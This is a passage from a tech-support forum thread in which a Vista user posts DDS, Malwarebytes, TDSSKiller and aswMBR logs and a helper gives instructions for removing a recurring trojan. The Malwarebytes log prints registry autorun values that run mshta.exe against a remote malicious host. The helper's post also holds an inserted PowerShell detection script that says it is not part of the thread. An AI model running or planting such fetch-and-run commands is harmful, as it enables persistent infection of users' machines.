C:\Windows\system32\svchost.exe -k rpcss
c:\Program Files\Microsoft Security Client\MsMpEng.exe
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\SLsvc.exe
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\Ati2evxx.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\Dwm.exe
C:\Windows\system32\taskeng.exe
C:\Windows\system32\taskeng.exe
C:\Windows\Explorer.EXE
C:\Windows\system32\agrsmsvc.exe
C:\Windows\system32\svchost.exe -k apphost
C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
c:\PROGRA~1\mcafee\SITEAD~1\mcsacore.exe
C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
C:\Windows\system32\rundll32.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\System32\tcpsvcs.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe
C:\Windows\system32\svchost.exe -k imgsvc
C:\Program Files\TeamViewer\Version6\TeamViewer_Service.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Toshiba\TOSHIBA DVD PLAYER\TNaviSrv.exe
C:\Program Files\Real\RealPlayer\Update\realsched.exe
C:\Program Files\DivX\DivX Update\DivXUpdate.exe
C:\Program Files\Common Files\Java\Java Update\jusched.exe
C:\Windows\system32\TODDSrv.exe
C:\Program Files\Common Files\Ulead Systems\DVD\ULCDRSvr.exe
C:\Windows\system32\svchost.exe -k iissvcs
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Program Files\Synaptics\SynTP\SynToshiba.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files\Microsoft Security Client\msseces.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\TeamViewer\Version6\TeamViewer.exe
C:\Windows\system32\mshta.exe
C:\Program Files\Yahoo!\Messenger\ymsgr_tray.exe
C:\Program Files\iPod\bin\iPodService.exe
C:\Windows\System32\alg.exe
C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
C:\Windows\system32\SearchProtocolHost.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe
C:\Windows\system32\wbem\wmiprvse.exe
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxp://search.imesh.com/
mStart Page = hxxp://home.sweetim.com
mSearch Bar = hxxp://us.rd.yahoo.com/customize/ie/defaults/sb/msgr8/*http://www.yahoo.com/ext/search/search.html
uInternet Settings,ProxyOverride = *.local
uURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
mURLSearchHooks: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
mURLSearchHooks: H - No File
BHO: Adobe PDF Reader Link Helper: {06849e9f-c8d7-4d59-b87d-784b7d6be0b3} - c:\program files\common files\adobe\acrobat\activex\AcroIEHelper.dll
BHO: Skype add-on (mastermind): {22bf413b-c6d2-4d91-82a9-a0f997ba588c} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
BHO: RealPlayer Download and Record Plugin for Internet Explorer: {3049c3e9-b461-4bc5-8870-4c09146192ca} - c:\programdata\real\realplayer\browserrecordplugin\ie\rpbrowserrecordplugin.dll
BHO: DivX Plus Web Player HTML5 : {326e768d-4182-46fd-9c16-1449a49795f4} - c:\program files\divx\divx plus web player\ie\divxhtml5\DivXHTML5.dll
BHO: Windows Live ID Sign-in Helper: {9030d464-4c02-4abf-8ecc-5164760863c6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: McAfee SiteAdvisor BHO: {b164e929-a1b6-4a06-b104-2cd0e90a88ff} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
BHO: Java(tm) Plug-In 2 SSV Helper: {dbc80044-a445-435b-bc74-9c25c1c588a9} - c:\program files\oracle\javafx 2.0 runtime\bin\jp2ssv.dll
BHO: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
TB: Veoh Browser Plug-in: {d0943516-5076-4020-a3b5-aefaf26ab263} - c:\program files\veoh networks\veoh\plugins\reg\VeohToolbar.dll
TB: Veoh Web Player Video Finder: {0fbb9689-d3d7-4f7a-a2e2-585b10099bfc} - c:\program files\veoh networks\veohwebplayer\VeohIEToolbar.dll
TB: McAfee SiteAdvisor Toolbar: {0ebbbe48-bad4-4b4c-8e5a-516abecae064} - c:\progra~1\mcafee\sitead~1\mcieplg.dll
TB: uTorrentControl Toolbar: {e9df9360-97f8-4690-afe6-996c80790da4} - c:\program files\utorrentcontrol\prxtbuTor.dll
TB: {A057A204-BACC-4D26-9990-79A187E2698E} - No File
uRun: [Sidebar] c:\program files\windows sidebar\sidebar.exe /autoRun
uRun: [Yahoo! Pager] "c:\progra~1\yahoo!\messen~1\YAHOOM~1.EXE" -quiet
mRun: [RtHDVCpl] RtHDVCpl.exe
mRun: [Apoint] c:\program files\apoint2k\Apoint.exe
mRun: [Skytel] Skytel.exe
mRun: [Adobe Reader Speed Launcher] "c:\program files\adobe\reader 8.0\reader\Reader_sl.exe"
mRun: [00TCrdMain] %ProgramFiles%\TOSHIBA\FlashCards\TCrdMain.exe
mRun: [SynTPEnh] c:\program files\synaptics\syntp\SynTPEnh.exe
mRun: [QuickTime Task] "c:\program files\quicktime\QTTask.exe" -atboottime
mRun: [TkBellExe] "c:\program files\real\realplayer\update\realsched.exe" -osboot
mRun: [DivXUpdate] "c:\program files\divx\divx update\DivXUpdate.exe" /CHECKNOW
mRun: [SunJavaUpdateSched] "c:\program files\common files\java\java update\jusched.exe"
mRun: [APSDaemon] "c:\program files\common files\apple\apple application support\APSDaemon.exe"
mRun: [iTunesHelper] "c:\program files\itunes\iTunesHelper.exe"
mRun: [MSC] "c:\program files\microsoft security client\msseces.exe" -hide -runkey
dRun: [Picasa Media Detector] c:\program files\picasa2\PicasaMediaDetector.exe
mPolicies-explorer: BindDirectlyToPropertySetStorage = 0 (0x0)
mPolicies-system: EnableUIADesktopToggle = 0 (0x0)
mPolicies-system: EnableLinkedConnections = 1 (0x1)
IE: {77BF5300-1474-4EC7-9980-D32B190E9B07} - {77BF5300-1474-4EC7-9980-D32B190E9B07} - c:\program files\skype\toolbars\internet explorer\SkypeIEPlugin.dll
LSP: c:\windows\system32\wpclsp.dll
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0029-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_29-windows-i586.cab
DPF: {CAFEEFAC-0017-0000-0003-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} - hxxp://java.sun.com/update/1.7.0/jinstall-1_7_0_03-windows-i586.cab
TCP: DhcpNameServer = 192.168.1.1
TCP: Interfaces\{AA0BA040-CE6A-4F94-8BD1-7AFDC60B8156} : DhcpNameServer = 192.168.1.1
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\progra~1\mcafee\sitead~1\McIEPlg.dll
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - c:\progra~1\common~1\skype\SKYPE4~1.DLL
.
================= FIREFOX ===================
.
FF - ProfilePath - c:\users\gagan\appdata\roaming\mozilla\firefox\profiles\bav5d5wt.default\
FF - prefs.js: browser.search.selectedEngine - GoogIe
FF - prefs.js: browser.startup.homepage - hxxp://www.aol.com/
FF - prefs.js: keyword.URL - hxxp://search.conduit.com/ResultsExt.aspx?ctid=CT3072254&SearchSource=2&q=
FF - plugin: c:\program files\divx\divx ovs helper\npovshelper.dll
FF - plugin: c:\program files\divx\divx plus web player\npdivx32.dll
FF - plugin: c:\program files\mcafee\siteadvisor\NPMcFFPlg32.dll
FF - plugin: c:\program files\microsoft silverlight\4.1.10329.0\npctrlui.dll
FF - plugin: c:\program files\mozilla firefox\plugins\npPandoWebInst.dll
FF - plugin: c:\program files\oracle\javafx 2.0 runtime\bin\plugin2\npjp2.dll
FF - plugin: c:\program files\veoh networks\veoh\plugins\noreg\NPVeohVersion.dll
FF - plugin: c:\program files\veoh networks\veohwebplayer\npWebPlayerVideoPluginATL.dll
FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprpchromebrowserrecordext.dll
FF - plugin: c:\programdata\real\realplayer\browserrecordplugin\mozillaplugins\nprphtml5videoshim.dll
FF - plugin: c:\users\gagan\appdata\local\google\update\1.3.21.111\npGoogleUpdate3.dll
FF - plugin: c:\users\gagan\appdata\locallow\unity\webplayer\loader\npUnity3D32.dll
FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgoogletalk.dll
FF - plugin: c:\users\gagan\appdata\roaming\mozilla\plugins\npgtpo3dautoplugin.dll
FF - plugin: c:\windows\system32\macromed\flash\NPSWF32_11_2_202_235.dll
FF - plugin: c:\windows\system32\npDeployJava1.dll
FF - plugin: c:\windows\system32\npmproxy.dll
.
---- FIREFOX POLICIES ----
FF - user.js: browser.search.selectedEngine - GoogIe
FF - user.js: keyword.URL - hxxp://www.theast.com/search/?ie=UTF-8&oe=UTF-8&sourceid=navclient&gfns=1&rls=sIjcOCzt&q=
FF - user.js: yahoo.homepage.dontask - true
.
============= SERVICES / DRIVERS ===============
.
R0 MpFilter;Microsoft Malware Protection Driver;c:\windows\system32\drivers\MpFilter.sys [2012-3-20 171064]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\progra~1\mcafee\sitead~1\mcsacore.exe [2011-5-24 95200]
R2 TeamViewer6;TeamViewer 6;c:\program files\teamviewer\version6\TeamViewer_Service.exe [2011-1-27 2253688]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2010-3-18 130384]
S2 FontCache;Windows Font Cache Service;c:\windows\system32\svchost.exe -k LocalServiceAndNoImpersonation [2008-6-19 21504]
S3 AdobeFlashPlayerUpdateSvc;Adobe Flash Player Update Service;c:\windows\system32\macromed\flash\FlashPlayerUpdateService.exe [2012-4-7 257696]
S3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\drivers\NisDrvWFP.sys [2012-3-20 74112]
S3 NisSrv;Microsoft Network Inspection;c:\program files\microsoft security client\NisSrv.exe [2012-3-26 214952]
S3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\microsoft.net\framework\v4.0.30319\wpf\WPFFontCache_v0400.exe [2010-3-18 753504]
S3 WSDPrintDevice;WSD Print Support via UMB;c:\windows\system32\drivers\WSDPrint.sys [2008-6-19 16896]
S4 dldt_device;dldt_device;c:\windows\system32\dldtcoms.exe -service --> c:\windows\system32\dldtcoms.exe -service [?]
S4 dldtCATSCustConnectService;dldtCATSCustConnectService;c:\windows\system32\spool\drivers\w32x86\3\dldtserv.exe [2009-7-9 98984]
S4 Giraffic;Veoh Giraffic Video Accelerator;c:\program files\giraffic\veoh_girafficwatchdog.exe --service --> c:\program files\giraffic\Veoh_GirafficWatchdog.exe --service [?]
S4 StarWindServiceAE;StarWind AE Service;c:\program files\alcohol soft\alcohol 52\starwind\StarWindServiceAE.exe [2007-5-28 275968]
.
=============== Created Last 30 ================
.
2012-05-31 04:16:15	6737808	----a-w-	c:\programdata\microsoft\microsoft antimalware\definition updates\{e94b2023-122d-433a-ae9a-3132e3d1fc8c}\mpengine.dll
2012-05-30 04:28:50	6737808	------w-	c:\programdata\microsoft\microsoft antimalware\definition updates\backup\mpengine.dll
2012-05-30 04:16:06	--------	d-----w-	c:\users\gagan\appdata\local\temp
2012-05-30 04:05:51	--------	d-----w-	C:\$RECYCLE.BIN
2012-05-30 03:46:31	--------	d-----w-	C:\ComboFix
2012-05-29 02:31:16	98816	----a-w-	c:\windows\sed.exe
2012-05-29 02:31:16	518144	----a-w-	c:\windows\SWREG.exe
2012-05-29 02:31:16	256000	----a-w-	c:\windows\PEV.exe
2012-05-29 02:31:16	208896	----a-w-	c:\windows\MBR.exe
2012-05-22 05:16:47	713784	------w-	c:\programdata\microsoft\microsoft antimalware\definition updates\{f78cef23-eb95-4ded-8458-48e319614326}\gapaengine.dll
2012-05-22 05:09:57	--------	d-----w-	c:\program files\Microsoft Security Client
2012-05-19 08:37:25	6737808	----a-w-	c:\programdata\microsoft\windows defender\definition updates\{3070ec37-30ca-43ae-ac15-bbe0716a8aad}\mpengine.dll
2012-05-19 05:43:51	--------	d-----w-	c:\programdata\vsint
2012-05-14 22:57:56	53120	----a-w-	c:\windows\system32\drivers\partmgr.sys
2012-05-14 22:57:42	914304	----a-w-	c:\windows\system32\drivers\tcpip.sys
2012-05-14 22:57:41	31232	----a-w-	c:\windows\system32\drivers\tcpipreg.sys
2012-05-14 22:57:34	1404928	----a-w-	c:\program files\common files\microsoft shared\ink\InkObj.dll
2012-05-14 22:57:32	936960	----a-w-	c:\program files\common files\microsoft shared\ink\journal.dll
2012-05-14 22:57:20	1069056	----a-w-	c:\windows\system32\DWrite.dll
2012-05-14 22:57:19	219648	----a-w-	c:\windows\system32\d3d10_1core.dll
2012-05-14 22:57:19	1172480	----a-w-	c:\windows\system32\d3d10warp.dll
2012-05-14 22:57:18	683008	----a-w-	c:\windows\system32\d2d1.dll
2012-05-14 22:57:18	160768	----a-w-	c:\windows\system32\d3d10_1.dll
2012-05-14 22:56:51	3550080	----a-w-	c:\windows\system32\ntoskrnl.exe
2012-05-14 22:56:50	3602816	----a-w-	c:\windows\system32\ntkrnlpa.exe
2012-05-14 22:56:49	2044928	----a-w-	c:\windows\system32\win32k.sys
2012-05-09 04:58:39	592824	----a-w-	c:\program files\mozilla firefox\gkmedias.dll
2012-05-09 04:58:39	44472	----a-w-	c:\program files\mozilla firefox\mozglue.dll
.
==================== Find3M ====================
.
2012-05-05 06:08:36	70304	----a-w-	c:\windows\system32\FlashPlayerCPLApp.cpl
2012-05-05 06:08:36	419488	----a-w-	c:\windows\system32\FlashPlayerApp.exe
2012-04-04 19:56:40	22344	----a-w-	c:\windows\system32\drivers\mbam.sys
2012-03-21 00:44:12	74112	----a-w-	c:\windows\system32\drivers\NisDrvWFP.sys
2012-03-21 00:44:12	171064	----a-w-	c:\windows\system32\drivers\MpFilter.sys
.
============= FINISH: 0:42:54.46 ===============


----------



## gagraptor (May 23, 2012)

Malwarebytes Anti-Malware 1.61.0.1400
www.malwarebytes.org

Database version: v2012.05.28.01

Windows Vista Service Pack 2 x86 NTFS
Internet Explorer 8.0.6001.19222
GAGAN :: GAGAN-PC [administrator]

5/31/2012 12:07:13 AM
mbam-log-2012-05-31 (00-33-35).txt

Scan type: Quick scan
Scan options enabled: Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken | PUP | PUM
Scan options disabled: P2P
Objects scanned: 206101
Time elapsed: 13 minute(s), 40 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 0
(No malicious items detected)

Registry Values Detected: 3
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|SystemBootirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://nightwoman.net/reg2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP&log=1 -> No action taken.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run|RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://nightwoman.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP -> No action taken.
HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce|RegWriteirfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP (Trojan.PMovie.Gen) -> Data: mshta.exe http://nightwoman.net/set_inf2.php?cccid=irfzXJvu2w6rbS0HT6u6qNCcCsJqkMCP -> No action taken.

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

(end)


----------



## gagraptor (May 23, 2012)

Malwarebytes does not seem to be able to remove these trojans. It reports that they are removed, but they show up in the next scan I run.
Would running it in safe mode help?


----------



## Mark1956 (May 7, 2011)

You can see that the internet site the reg keys are pointing to has changed. Malwarebytes is removing them but they are being recreated by an infection. We need to scan with other tools.

Please follow the instructions exactly as written, deviating from the instructions and trying to fix anything before I have seen the logs may make your PC unbootable. If TDSSKiller does not offer the Cure option *DO NOT select delete* as you may remove files needed for the system to operate.

Please follow this:

*STEP 1*
Please download Kaspersky's *TDSSKiller* and *save it to your Desktop. <-Important!*
_-- The tool is frequently updated...if you used TDSSKiller before, delete that version and download the most current one before using again._

_Be sure to print out and follow the instructions for performing a scan_.

Extract (unzip) the file to your desktop and make sure TDSSKiller.exe (the contents of the zipped file) is on the Desktop itself, not within a folder on the Desktop.
Alternatively, you can download TDSSKiller.exe and use that instead.
Double-click on *TDSSKiller.exe* to run the tool for known TDSS variants.
_*Vista*/*Windows 7* users right-click and select Run As Administrator_.
If an update is available, TDSSKiller will prompt you to update and download the most current version. Click *Load Update*. Close TDSSKiller and start again.

When the program opens, click the *Change parameters.*
Under "Additional options", check the boxes next to *Verify file digital signatures* and *Detect TDLFS file system*, then click *OK*.
Click the *Start Scan* button.
Do not use the computer during the scan
If the scan completes with nothing found, click *Close* to exit.
If '*Suspicious objects*' are detected, the default action will be *Skip*. Leave the default set to Skip and click on *Continue*.
If *Malicious objects* are detected, they will show in the Scan results - Select action for found objects and offer three options.
Ensure *Cure* is selected...then click *Continue* -> *Reboot computer* *for cure completion.*
*Important! ->* If *Cure* *is not available*, please choose *Skip* instead. *Do not choose Delete unless instructed.* If you choose *Delete* you may *remove critical system files* and make your PC *unstable* or possibly *unbootable*.
A log file named *TDSSKiller_version_date_time_log.txt* will be created and saved to the root directory (usually Local Disk C:).
Copy and paste the contents of that file in your next reply.
_-- If TDSSKiller does not run, try renaming it. To do this, right-click on *TDSSKiller.exe*, select *Rename* and give it a random name with the *.com* file extension (i.e. 123abc.com). If you do not see the file extension, please refer to these instructions. In some cases it may be necessary to redownload TDSSKiller and randomly rename it to something else *before* beginning the download and saving to the computer or to perform the scan in "safe mode"._

*STEP 2*

Please download *aswMBR.exe* and save it to your Desktop.

Double click on aswMBR.exe to run it. _*Vista*/*Windows 7* users right-click and select Run As Administrator_.
Click the *Scan* button to start scan.
On completion of the scan, click the *Save log* button and save it to your Desktop.
*Do not* select any Fix options at this time.
Copy and paste the contents of that log in your next reply.
*-- Important note*: Upon the first run, aswMBR will back up the MBR and save it to the Desktop as *MBR.dat*. Do not delete this file unless advised.
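The point made above, that Malwarebytes deletes the Run/RunOnce values but something re-creates them, is one a practitioner would confirm directly on the host before deciding what to remove. The PowerShell below is an added example written for this thread; it is not part of ComboFix, Malwarebytes, DDS, TDSSKiller or aswMBR, and it is not part of the helper's instructions. It reads the autorun keys that Malwarebytes flagged, reports any value whose data launches a script host such as mshta.exe with a URL, lists the live mshta.exe processes together with their parent process, and checks scheduled tasks the same way. The function names, the key list and the regular expression are this example's own choices, and it deletes nothing. It uses only cmdlets available in PowerShell 2.0, so it runs on Vista.

```powershell
# Added example (not from the thread or its tools): read-only hunt for
# autorun entries that launch a script host with a URL, the pattern seen in
# the Malwarebytes log, plus the live processes and the scheduled tasks.
# Assumed/hypothetical names: $autorunKeys, $lolbinPattern and the three
# Get-* functions are this example's own. Run from an elevated prompt.

$autorunKeys = @(
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce',
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run',
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run'
)

# Signed Windows binaries that will fetch and run remote script content.
# An autorun that starts one of them with an http(s) URL argument is the
# fileless launcher shape reported above (mshta.exe http://...).
$lolbinPattern = '(?i)\b(mshta|wscript|cscript|rundll32|regsvr32)(\.exe)?\b.*\bhttps?://'

# Metadata properties Get-ItemProperty adds that are not registry values.
$psMeta = @('PSPath', 'PSParentPath', 'PSChildName', 'PSDrive', 'PSProvider')

function Get-SuspiciousAutoruns {
    foreach ($key in $autorunKeys) {
        if (-not (Test-Path $key)) { continue }
        $props = Get-ItemProperty -Path $key
        foreach ($p in $props.PSObject.Properties) {
            if ($psMeta -contains $p.Name) { continue }
            $data = [string]$p.Value
            if ($data -match $lolbinPattern) {
                New-Object PSObject -Property @{
                    Key  = $key
                    Name = $p.Name
                    Data = $data
                }
            }
        }
    }
}

function Get-LolbinProcesses {
    # WMI exposes the full command line and the parent PID, which is what
    # identifies whoever started the popup process.
    $procs = Get-WmiObject Win32_Process
    foreach ($proc in $procs) {
        if ($proc.Name -match '^(mshta|wscript|cscript)\.exe$') {
            $parent = $procs | Where-Object { $_.ProcessId -eq $proc.ParentProcessId }
            $parentName = '<exited>'
            if ($parent) { $parentName = $parent.Name }
            New-Object PSObject -Property @{
                Pid         = $proc.ProcessId
                Name        = $proc.Name
                ParentPid   = $proc.ParentProcessId
                ParentName  = $parentName
                CommandLine = $proc.CommandLine
            }
        }
    }
}

function Get-SuspiciousTasks {
    # Scheduled tasks are the other usual home for something that fires on a
    # timer; schtasks /v exposes the action in the "Task To Run" column.
    $rows = schtasks /query /fo csv /v 2>$null | ConvertFrom-Csv
    foreach ($row in $rows) {
        $action = [string]$row.'Task To Run'
        if ($action -match $lolbinPattern) {
            New-Object PSObject -Property @{
                TaskName = $row.TaskName
                Action   = $action
            }
        }
    }
}

"== Autorun values launching a script host with a URL =="
Get-SuspiciousAutoruns | Format-Table Key, Name, Data -AutoSize -Wrap

"== Live script-host processes and their parents =="
Get-LolbinProcesses | Format-Table Pid, Name, ParentPid, ParentName, CommandLine -AutoSize -Wrap

"== Scheduled tasks whose action matches =="
Get-SuspiciousTasks | Format-Table TaskName, Action -AutoSize -Wrap
```

Read the ParentName column first. A parent of explorer.exe means a logon autorun started the popup; on Vista a parent of taskeng.exe means the Task Scheduler engine started it, so look in the third table; any other parent is a candidate for the process that keeps re-writing the Run values and is what to report back to the helper rather than delete on your own.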


----------



## gagraptor (May 23, 2012)

aswMBR version 0.9.9.1665 Copyright(c) 2011 AVAST Software
Run date: 2012-06-01 00:59:48
-----------------------------
00:59:48.567 OS Version: Windows 6.0.6002 Service Pack 2
00:59:48.567 Number of processors: 2 586 0x6801
00:59:48.570 ComputerName: GAGAN-PC UserName: GAGAN
00:59:49.640 Initialize success
01:01:13.692 AVAST engine defs: 12053101
01:01:51.643 Disk 0 (boot) \Device\Harddisk0\DR0 -> \Device\Ide\IdeDeviceP0T0L0-0
01:01:51.645 Disk 0 Vendor: FUJITSU_MHX2250BT 0040000C Size: 238475MB BusType: 3
01:01:51.681 Disk 0 MBR read successfully
01:01:51.684 Disk 0 MBR scan
01:01:51.691 Disk 0 Windows VISTA default MBR code
01:01:51.706 Disk 0 Partition 1 00 27 Hidden NTFS WinRE NTFS 1500 MB offset 2048
01:01:51.739 Disk 0 Partition 2 80 (A) 07 HPFS/NTFS NTFS 236974 MB offset 3074048
01:01:51.761 Disk 0 scanning sectors +488396800
01:01:51.890 Disk 0 scanning C:\Windows\system32\drivers
01:02:19.054 Service scanning
01:02:46.805 Service MpKsl969ad15c c:\ProgramData\Microsoft\Microsoft Antimalware\Definition Updates\{50C28A22-B3EC-472C-BB7F-F841BF47E300}\MpKsl969ad15c.sys **LOCKED** 32
01:03:04.441 Service sptd C:\Windows\System32\Drivers\sptd.sys **LOCKED** 32
01:03:25.312 Modules scanning
01:03:49.726 Disk 0 trace - called modules:
01:03:49.756 ntkrnlpa.exe CLASSPNP.SYS disk.sys acpi.sys hal.dll >>UNKNOWN [0x855401f8]<<
01:03:49.762 1 nt!IofCallDriver -> \Device\Harddisk0\DR0[0x85ddc8e0]
01:03:49.767 3 CLASSPNP.SYS[881138b3] -> nt!IofCallDriver -> [0x85621310]
01:03:49.773 5 acpi.sys[82b3b6bc] -> nt!IofCallDriver -> \Device\Ide\IdeDeviceP0T0L0-0[0x8559bb98]
01:03:49.779 \Driver\atapi[0x8562ed40] -> IRP_MJ_CREATE -> 0x855401f8
01:03:50.757 AVAST engine scan C:\Windows
01:03:59.486 AVAST engine scan C:\Windows\system32
01:12:07.695 AVAST engine scan C:\Windows\system32\drivers
01:12:39.190 AVAST engine scan C:\Users\GAGAN
01:14:56.205 Disk 0 MBR has been saved successfully to "C:\Users\GAGAN\Desktop\MBR.dat"
01:14:56.262 The log file has been saved successfully to "C:\Users\GAGAN\Desktop\aswMBR.txt"

Not sure if this is right, but it is the only log file I found.


----------



## gagraptor (May 23, 2012)

00:52:26.0398 4512	TDSS rootkit removing tool 2.7.36.0 May 21 2012 16:40:16
00:52:26.0651 4512	============================================================
00:52:26.0651 4512	Current date / time: 2012/06/01 00:52:26.0651
00:52:26.0651 4512	SystemInfo:
00:52:26.0651 4512	
00:52:26.0651 4512	OS Version: 6.0.6002 ServicePack: 2.0
00:52:26.0651 4512	Product type: Workstation
00:52:26.0651 4512	ComputerName: GAGAN-PC
00:52:26.0652 4512	UserName: GAGAN
00:52:26.0652 4512	Windows directory: C:\Windows
00:52:26.0652 4512	System windows directory: C:\Windows
00:52:26.0652 4512	Processor architecture: Intel x86
00:52:26.0652 4512	Number of processors: 2
00:52:26.0652 4512	Page size: 0x1000
00:52:26.0652 4512	Boot type: Normal boot
00:52:26.0652 4512	============================================================
00:52:29.0672 4512	Drive \Device\Harddisk0\DR0 - Size: 0x3A38B2E000 (232.89 Gb), SectorSize: 0x200, Cylinders: 0x76C1, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000050
00:52:29.0675 4512	============================================================
00:52:29.0675 4512	\Device\Harddisk0\DR0:
00:52:29.0675 4512	MBR partitions:
00:52:29.0675 4512	\Device\Harddisk0\DR0\Partition0: MBR, Type 0x7, StartLBA 0x2EE800, BlocksNum 0x1CED7000
00:52:29.0675 4512	============================================================
00:52:29.0782 4512	C: <-> \Device\Harddisk0\DR0\Partition0
00:52:29.0782 4512	============================================================
00:52:29.0782 4512	Initialize success
00:52:29.0782 4512	============================================================
00:53:02.0269 4376	============================================================
00:53:02.0269 4376	Scan started
00:53:02.0269 4376	Mode: Manual; SigCheck; TDLFS; 
00:53:02.0269 4376	============================================================
00:53:03.0704 4376	ACPI (82b296ae1892fe3dbee00c9cf92f8ac7) C:\Windows\system32\drivers\acpi.sys
00:53:03.0845 4376	ACPI - ok
00:53:04.0016 4376	AdobeFlashPlayerUpdateSvc (76d5a3d2a50402a0b9b6ed13c4371e79) C:\Windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe
00:53:04.0032 4376	AdobeFlashPlayerUpdateSvc - ok
00:53:04.0141 4376	adp94xx (2edc5bbac6c651ece337bde8ed97c9fb) C:\Windows\system32\drivers\adp94xx.sys
00:53:04.0203 4376	adp94xx - ok
00:53:04.0313 4376	adpahci (b84088ca3cdca97da44a984c6ce1ccad) C:\Windows\system32\drivers\adpahci.sys
00:53:04.0328 4376	adpahci - ok
00:53:04.0469 4376	adpu160m (7880c67bccc27c86fd05aa2afb5ea469) C:\Windows\system32\drivers\adpu160m.sys
00:53:04.0484 4376	adpu160m - ok
00:53:04.0515 4376	adpu320 (9ae713f8e30efc2abccd84904333df4d) C:\Windows\system32\drivers\adpu320.sys
00:53:04.0531 4376	adpu320 - ok
00:53:04.0593 4376	AeLookupSvc (9d1fda9e086ba64e3c93c9de32461bcf) C:\Windows\System32\aelupsvc.dll
00:53:04.0703 4376	AeLookupSvc - ok
00:53:04.0859 4376	AFD (3911b972b55fea0478476b2e777b29fa) C:\Windows\system32\drivers\afd.sys
00:53:04.0905 4376	AFD - ok
00:53:04.0952 4376	AgereModemAudio (39e435c90c9c4f780fa0ed05ca3c3a1b) C:\Windows\system32\agrsmsvc.exe
00:53:04.0983 4376	AgereModemAudio - ok
00:53:05.0280 4376	AgereSoftModem (ce91b158fa490cf4c4d487a4130f4660) C:\Windows\system32\DRIVERS\AGRSM.sys
00:53:05.0358 4376	AgereSoftModem - ok
00:53:05.0483 4376	agp440 (ef23439cdd587f64c2c1b8825cead7d8) C:\Windows\system32\drivers\agp440.sys
00:53:05.0498 4376	agp440 - ok
